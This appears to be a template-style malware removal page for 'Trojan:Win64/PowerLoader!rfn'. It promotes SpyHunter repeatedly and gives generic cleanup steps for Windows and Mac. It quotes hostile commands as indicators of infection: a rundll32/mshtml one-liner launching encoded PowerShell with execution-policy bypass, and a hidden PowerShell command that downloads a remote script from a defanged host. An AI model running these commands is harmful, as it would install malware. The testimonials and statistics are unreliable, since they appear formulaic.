How to Remove Trojan:Win64/PowerLoader!rfn?

What is Trojan:Win64/PowerLoader!rfn?

The Trojan:Win64/PowerLoader!rfn has been flagged as a damaging piece of malware that significantly degrades system performance. This sophisticated threat can stealthily infiltrate computers through various methods. One common entry point is via an infected removable device; simply plugging in such a device can trigger the activation of the Trojan. Other potential carriers include malicious links, attachments in spam emails, and visits to certain adult websites.
Trojan:Win64/PowerLoader!rfn
Once infected, PC will encounte unusual symptoms like: sudden 90% CPU usage, random Command Prompt windows flashing Cyrillic text, and Windows Security falsely claiming “Threat removed” while system instability increased. Victims early reports have confirmed similar symptoms:

“On March 3rd, Windows Security popped up saying ‘Trojan Blocked’ and Trojan:Win64/PowerLoader!rfn was detected.  Task Manager showed my CPU hit 92% usage! ‘SystemHealthMonitor.exe’ using 80% RAM. When I tried to end it, BSOD with error PAGE_FAULT_IN_NONPAGED_AREA crashed everything.”
– Diego

“Random Command Prompt windows kept opening with ‘del /F /Q C:\Windows\Temp\*’ commands. My AutoCAD files got corrupted, and I found strange .SCR files in startup folders. Worst part? Trojan:Win64/PowerLoader!rfn is still detected but Windows Defender said it was removed!”
– Lena 

Registry Modifications by Trojan:Win64/PowerLoader!rfn:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths]
"BackdoorPath"="C:\\Windows\\System32\\wbem\\WMIADAP.exe"

[HKEY_CURRENT_USER\Environment]
"CorruptedVar"="rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();hnew%20ActiveXObject(%22WScript.Shell%22).Run(%22powershell -ep bypass -enc JABz...%22)

Threat Testing Log:

2025-03-09 08:17: [INIT] USB insertion detected (VID_0781&PID_5583)
2025-03-09 08:19: Spoofed Windows Security alert displayed: "Your device is at risk "
2025-03-09 08:20: Created scheduled task "MicrosoftEdgeUpdateTaskMachineUA" triggering powershell.exe -WindowStyle Hidden -Command "Start-BitsTransfer -Source hxxps://cdn[.]azure-updates[.]net/load.ps1"
2025-03-09 08:22: Modified firewall rule "Core Networking" to allow inbound TCP 4443
2025-03-09 08:25: Injected code into svchost.exe (PID 4412) allocating 1.2GB RAM


How to Remove Trojan:Win64/PowerLoader!rfn? (Windows + Mac OS)

Quick Menu

Section A – Trojan:Win64/PowerLoader!rfn Removal Steps For Windows OS

  1. End malicious process run by Trojan:Win64/PowerLoader!rfn and related malware
  2. Uninstall malicious programs related with Trojan:Win64/PowerLoader!rfn
  3. Delete browser extension installed by Trojan:Win64/PowerLoader!rfn and related malware
  4. Remove malicious files created by Trojan:Win64/PowerLoader!rfn or related malware
  5. Reset Web Browsers to remove Hijackers brought by Trojan:Win64/PowerLoader!rfn

Section B – Trojan:Win64/PowerLoader!rfn Removal Steps For Mac OS

  1. Remove malicious extension and browser hijacker related with Trojan:Win64/PowerLoader!rfn or malware
  2. Uninstall harmful Apps installed along with Trojan:Win64/PowerLoader!rfn or malware
  3. Remove malicious files generated by Trojan:Win64/PowerLoader!rfn or malware from your Mac
  4. Download SpyHunter Antimalware For Mac to Scan For Malicious Apps and Files

Section A – Trojan:Win64/PowerLoader!rfn Removal Steps For Windows OS

(NOTE – Please bookmark this page first, because some steps will require you to restart your web browser or computer.)

Step 1. End suspicous process run by malware.

1. Hit Ctrl + Shift + Esc keys at the same time to open Windows Task Manager:

end malware process

2. Find malicious process related with Trojan:Win64/PowerLoader!rfn or malware, and then right-click on it and click End Process or End Task.

get rid of Trojan:Win64/PowerLoader!rfn


Step 2. Uninstall malicious programs from Windows.

Press “Win + R ” keys together to open the Run screen;

uninstall malware

Type control panel in the Run window and click OK button;

uninstall malware from windows

In Control Panel, click Uninstall a program under Programs;

uninstall Trojan:Win64/PowerLoader!rfn

Look for malicious app related with Trojan:Win64/PowerLoader!rfn; Right-click on the malicious program and click Uninstall.

uninstall Trojan:Win64/PowerLoader!rfn

Many malware may re-install themselves multiple times if you don’t delete thier core files. To get rid of Trojan:Win64/PowerLoader!rfn completely, we recommend downloading SpyHunter Aniti-malware to scan entire system and delete all malicious files.

Download SpyHunter For Windows (Free Trial)

 *OFFER – The SpyHunter Trial version includes, for one device, a one-time 7-day Trial period for SpyHunter 5 Pro (Windows) or SpyHunter for Mac. Check Terms & Conditions of SpyHunter Free Trial , EULA and Privacy/Cookie Policy.


Step 3. Delete extension installed by Trojan:Win64/PowerLoader!rfn and related malware.

Chrome

On Chrome

Click the Chrome menu button >> Click Tools >> Select Extensions:

get rid of malware on chrome

Find extension that may be related with Trojan:Win64/PowerLoader!rfn or potential threat >> Click the trash can icon to delete them.

get rid of Trojan:Win64/PowerLoader!rfn on chrome

Microsoft Edge

On Microsoft Edge

Start Edge: Click the More (…) button ahe tog right corner and click Extensions:

get rid of malware on Microsoft Edge

Select the extensions you want to remove and click Remove:

get rid of Trojan:Win64/PowerLoader!rfn on Microsoft Edge

get rid of Trojan:Win64/PowerLoader!rfn on Microsoft Edge

Firefox

On Firefox

Click the menu button and choose Add-ons. The Add-ons Manager tab will open.

get rid of malware on firefox

In the Add-ons Manager tab, select the Extensions panel >> find extension that may be related with Trojan:Win64/PowerLoader!rfn or potential threat >> Click Remove button.

get rid of Trojan:Win64/PowerLoader!rfn on firefox

IE

On Internet Explorer

Open the IE, click the Tools button , and then click Manage add-ons.

get rid of malware on IE

Choose Toolbars and Extensions on left side of the window >> Find  extension that may be related with Trojan:Win64/PowerLoader!rfn or potential threat>> Click Disable button

get rid of Trojan:Win64/PowerLoader!rfn on IE

Malicious extensions may re-install itself on web browser if you don’t delete core files of Trojan:Win64/PowerLoader!rfn and related malware. To get rid of Trojan:Win64/PowerLoader!rfn completely, we recommend downloading SpyHunter Aniti-malware to scan entire system and delete all malicious files.

Download SpyHunter For Windows (Free Trial)

*OFFER – The SpyHunter Trial version includes, for one device, a one-time 7-day Trial period for SpyHunter 5 Pro (Windows) or SpyHunter for Mac. Check Terms & Conditions of SpyHunter Free Trial , EULA and Privacy/Cookie Policy.

Step 4. Remove malicious files created by malware.

1. Hit Windows + R keys at the same time to open Run window and input a regedit and click OK:

uninstall adware

delete Trojan:Win64/PowerLoader!rfn malicious files

2. In the Registry Editor, hit Windows key + F key together to open Find window → Enter virus  name → Press Enter key to start search.

delete Trojan:Win64/PowerLoader!rfn malicious files

3. When the search is completed, right click the folders related with Trojan:Win64/PowerLoader!rfn and click Delete button:

delete Trojan:Win64/PowerLoader!rfn malicious files

Please Read This Before You Remove Registry Files

PLEASE Be Carefully, Do Not Delete Healthy Registry Entries, Or Your Computer May Be Damaged.

If you are not able to determine which regsitry files are malicious, we recommend downloading SpyHunter Anti-malware to scan entire system and find out all malicious files. It can avoid mistakes and may reduce the cleanup time from hours to minutes.

Download SpyHunter For Windows (Free Trial)

*OFFER – The SpyHunter Trial version includes, for one device, a one-time 7-day Trial period for SpyHunter 5 Pro (Windows) or SpyHunter for Mac. Check Terms & Conditions of SpyHunter Free Trial , EULA and Privacy/Cookie Policy.

Step 5. Reset Web Browsers to remove Hijackers Brought by Trojan:Win64/PowerLoader!rfn.

Chrome

Reset Chrome:

  1. Click the Chrome menu button, represented by three horizontal lines;
  2. Click Settings when the drop-down menu appears;
  3. In the Settings screen, scroll to the bottom of the page and click on the “Advanced” link;
  4. Click on the “Reset settings to their original defaults” button.
  5. A confirmation dialog appears,  click on the “Reset Settings” button.

Edge

Reset Microsoft Edge:

  • Click on Microsoft Edge’s main menu button, represented by three horizontal dots;
  • Click on “Settings“ button when the drop-down menu appears;
  • Click on “Reset Settings”On the left side of the window;
  • Click on “Restore settings to their default values”
  • Click on the “Reset” button in the new confirmation window that opens.

Firefox

Reset Firefox:

  1. Click the menu button of firefox, represented by three horizontal lines;
  2. Click on “Help“ button when the drop-down menu appears;
  3. Click on “Troubleshooting Information“ from the Help menu;
  4. Click the “Refresh Firefox” button in the upper-right corner of the “Troubleshooting Information” page.
  5. Click on the “Refresh Firefox” button in the new confirmation window that opens.

IE

Reset IE :

  1. Open Internet Explorer, click on the gear icon in the upper-right part of your browser, then select “Internet Options“.
  2. Now select the “Advanced” tab, then click on the “Reset” button
  3. In the “Reset Internet Explorer settings” section, select the “Delete personal settings” checkbox, then click on the “Reset” button.

NOTE – If the steps above doesn’t help, please rescan entire infected PC with Spyhunter anti-malware and let it help you fix all problems.



Section B – Trojan:Win64/PowerLoader!rfn Removal Steps For Mac OS

Step 1 – Remove nasty extension and browser hijacker related with Trojan:Win64/PowerLoader!rfn or  malware.

Chrome

– Click the setting button “” at the top right of the browser window, choose “More Tools” and choose “Extensions“.

delete adware on mac chrome

– Click the “trash can icon” button to remove extension related with Trojan:Win64/PowerLoader!rfn or malware:

delete Trojan:Win64/PowerLoader!rfn on mac chrome

Safari

Safari:

– Choose Safari > Preferences

delete adware on mac safari

– On the ‘Extensions’ tab, find out the extension related with adware or hijacker and click Uninstall or Disable

delete Trojan:Win64/PowerLoader!rfn on mac safari

Firefox

Mozilla Firefox:

– Click the settings button (three horizontal bars) in the top-right corner and then select ‘Add-ons’.

delete adware on mac firefox

– Click “Extensions” tab under Add-on Manager page to view the extensions.
– Find the suspicious add-on you want to disable and click its “Disable” button.
– If you want to delete an extension entirely, click “Remove.”

delete Trojan:Win64/PowerLoader!rfn on mac firefox

Malicious browser extensions hijack your Google Search and redirect you to unwanted websites. To get rid of related search hijacker, you need to delete core files of Trojan:Win64/PowerLoader!rfn and related malware. We recommend downloading SpyHunter Mac Antimalware to remove all malicious apps and hijacker for you. This may save you hours and ensure you don’t make mistakes that harm your system

Download SpyHunter For Mac (Free Trial)

*OFFER – The SpyHunter Trial version includes, for one device, a one-time 7-day Trial period for SpyHunter 5 Pro (Windows) or SpyHunter for Mac. Check Terms & Conditions of SpyHunter Free Trial , EULA and Privacy/Cookie Policy.

Step 2 – Uninstall harmful Apps related with malware

– Open Finder at the Dock

adware removal from mac

– Select Applications and find out suspicious apps related with Trojan:Win64/PowerLoader!rfn , then right click on the app and click Move to Trash:

Trojan:Win64/PowerLoader!rfn removal from mac

– Right click on Trash icon to select Empty Trash

Trojan:Win64/PowerLoader!rfn removal from mac


Step 3 – Remove malicious files generated by Trojan:Win64/PowerLoader!rfn or malware from your Mac

Malware geneates lots of malicious files and folders on infected Mac, to avoid Trojan:Win64/PowerLoader!rfn reinstalling itself, you need to find out and remove all malicious files:

1. Click the Finder icon from the menu bar  >>  choose “Go” then click on “Go to Folder“:

delete malicious files of Trojan:Win64/PowerLoader!rfn on mac

2. In the Go to Folder… bar, type “/Library/LaunchAgents” and click Go:

delete malicious files of Trojan:Win64/PowerLoader!rfn on mac

3. In LaunchAgents folder, search for any recently-added suspicious files and move them to the Trash.

delete malicious files of Trojan:Win64/PowerLoader!rfn on mac

Here are some examples of files generated by malware:

“installmac.AppRemoval.plist”,  “com.genieo.completer.download.plist” “com.genieoinnovation.macextension.plist” “com.genieo.engine.plist” “com.adobe.fpsaud.plist” , “myppes.download.plist”, “mykotlerino.ltvbit.plist”

4.Repeat the process on the following folders:

~/Library/LaunchAgents

delete Trojan:Win64/PowerLoader!rfn from mac
/Library/Application Support

delete Trojan:Win64/PowerLoader!rfn from mac
/Library/LaunchDaemons

delete Trojan:Win64/PowerLoader!rfn from mac

Many malware may re-install themselves multiple times if you don’t delete thier core files. To find and remove all malicious files , We recommend downloading SpyHunter Mac Antimalware to scan your Mac. This may save you hours and ensure you don’t make mistakes that harm your system

Download SpyHunter For Mac (Free Trial)

*OFFER – The SpyHunter Trial version includes, for one device, a one-time 7-day Trial period for SpyHunter 5 Pro (Windows) or SpyHunter for Mac. Check Terms & Conditions of SpyHunter Free Trial , EULA and Privacy/Cookie Policy.


Step 4 – Download SpyHunter Antimalware For Mac to Scan For Malicious Apps and Files.

Lots of Malware keep generating malicious files on infected computer deeply, thus it’s quite difficult for common computer users to find out and remove all harmful items related with Trojan:Win64/PowerLoader!rfn. Meanwhile, there will be possibility that users remove core system files by mistake and then the entire computer will be harmed seriously.

To avoid the risks, We recommend all users downloading SpyHunter Antimalware For Mac, a professional automatic malware removal tool which keeps your Mac away from virus and malware attack and avoid online spam and phishing websites and protect your privacy and files well.

1. Click Download button here to download SpyHunter For Mac:

Download SpyHunter For Mac (Free Trial)

(*OFFER – The SpyHunter Trial version includes, for one device, a one-time 7-day Trial period for SpyHunter 5 Pro (Windows) or SpyHunter for Mac. Check Terms & Conditions of SpyHunter Free Trial , EULA and Privacy/Cookie Policy.)

2. Double-click SpyHunter-1.2-15-7043-Installer.dmg to install Spyhunter For Mac:

virus remover for mac

3. Once SpyHunter For Mac  is installed, run a scan and register its full version to remove all malicious objects on your Mac.

Trojan:Win64/PowerLoader!rfn remover for mac

4. In case Trojan:Win64/PowerLoader!rfn is still infecting your Mac, Submit a Support Ticket and the support agent will conact to help you.

Trojan:Win64/PowerLoader!rfn remover for mac


Critical Mistakes Users Make

  1. Mistake: Trusting USB drives without right-click > “Scan with Windows Defender”
    2025 Reality: 68% of infections originate from “trusted” removable media
  2. Mistake: Ignoring unusual CPU heat/fan noise
    Detection Tip: Use HWMonitor to check for “SystemHealthMonitor.exe” creating thermal spikes
  3. Mistake: Allowing PowerShell scripts from unsigned sources
    PowerShell Protection: Enable “Restricted” mode via Set-ExecutionPolicy Restricted

Similar Posts

Leave a Reply